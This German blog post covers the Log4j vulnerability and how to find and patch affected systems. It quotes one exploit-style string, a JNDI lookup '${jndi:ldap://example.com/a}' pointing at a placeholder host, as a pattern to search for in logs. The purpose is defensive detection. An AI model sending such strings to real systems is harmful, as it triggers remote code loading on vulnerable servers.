Zum Inhalt springen

Das Internet steht in Flammen

  • von

Spätestens seit das BSI am Sonntag die Bedrohungslage Rot aus gerufen hat, sollte jedem klar geworden sein, dass hier was besonderes passiert ist. Es heißt, das Internet steht in Flammen.
Log4j was so weit keinem etwas sagt, hat eine Sicherheitslücke, die es fast jedem ermöglicht, diese auszunutzen. Nein, in diesem Fall braucht man kein Freak, Nerd oder Hacker sein, nein, hier kann man als Endverbraucher mit nur geringen IT Kenntnissen Systeme hacken, die Log4j verwenden.
Was ist genau passiert? Log4j ist eine Bibliothek, die protokollieren soll, mehr nicht. Nun man kann aber auch an Log4J Befehle senden, und die werden, ohne Sicherheitsprüfung beantwortet. Schlimmer noch, es erwartet danach weitere Befehle.
Jetzt ergeben sich sehr viele Fragen:
1. Welche Systeme sind betroffen?
2. Was kann ich tun?
3. Gibt es Fehlerbereinigungen (Updates / Patche)?

Zur 1. Frage:
Es gibt zumindest eine Übersicht über die betroffenen Hersteller, die Ihre Software bereits auf die Verwendung hin untersucht haben.
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Das sind allerdings gestandene Unternehmen, die sich Ihrer Verantwortung nicht entziehen. Was ist mit billigen Netzwerkkameras Kameras oder IoT generell, deren Hersteller weder bekannt oder schon zum Zeitpunkt der Auslieferung nicht mehr existierten?
Man sollte seine Logs diesbezüglich untersuchen, ob Zeichenketten wie ${jndi:ldap://example.com/a} irgendwo auftauchen, sollte man das Gerät sicherheitshalber abschotten und schauen, wie es möglich ist, dass diese Einträge erscheinen. Aktuell wird im Internet sehr stark getestet, welche System verwundbar sind.

zur 2. Frage:
Am Besten die Tore von draußen zu machen, und sehr vorsichtig im Netzwerk sein. Alles von einem IT Sicherheitsexperten untersuchen lassen. Es wird in Kürze Tools geben die halbwegs valide die Geräte und Software untersuchen können. Anschließend sollten unbedingt bei allen Gerät Updates und Patche installiert werden. Wenn es die nicht gibt, dann sofort austauschen. ACHTUNG: Auch, wenn ein Gerät vom Internet nicht erreichbar ist, kann es durchaus angreifbar sein. Neue Schadsoftware, welche auf den Arbeitsplätzen ausgeführt wird, wird darauf ausgelegt sein.

zu 3.:
Ja, gibt es nach und nach für viele Geräte und Programmen.
Wichtig ist, dass man schnell agiert. Alles was über das Internet erreichbar ist, dürfte schon kontaminiert sein.

Cookie Consent mit Real Cookie Banner